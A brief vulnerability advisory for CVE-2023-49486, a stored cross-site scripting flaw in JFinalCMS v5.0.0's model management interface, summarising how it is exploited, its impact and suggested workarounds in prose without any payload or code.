CVE-2023-49486

Vulnerability

Description JFinalCMS v5.0.0 contains a stored cross-site scripting (XSS) vulnerability in the model management department. The application fails to sanitize user-supplied input before storing it in a persistent manner, allowing an attacker to inject arbitrary JavaScript or HTML code [2].

Exploitation

An attacker can exploit this vulnerability by crafting a malicious payload and submitting it through the model management interface. The injected script is stored on the server and subsequently executed in the context of any authenticated user who views the affected page. No authentication bypass is required beyond a valid session [1][2].

Impact

Successful exploitation enables an attacker to execute arbitrary JavaScript in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive data. Because the attack is stored, secondary victims visiting the compromised page will also trigger the payload [2].

Mitigation

The vulnerability is confirmed in JFinalCMS v5.0.0. At the time of publication, no official patch has been released. Users should review the vendor's repository for updates and apply input validation and output encoding as a temporary workaround [1][2][3].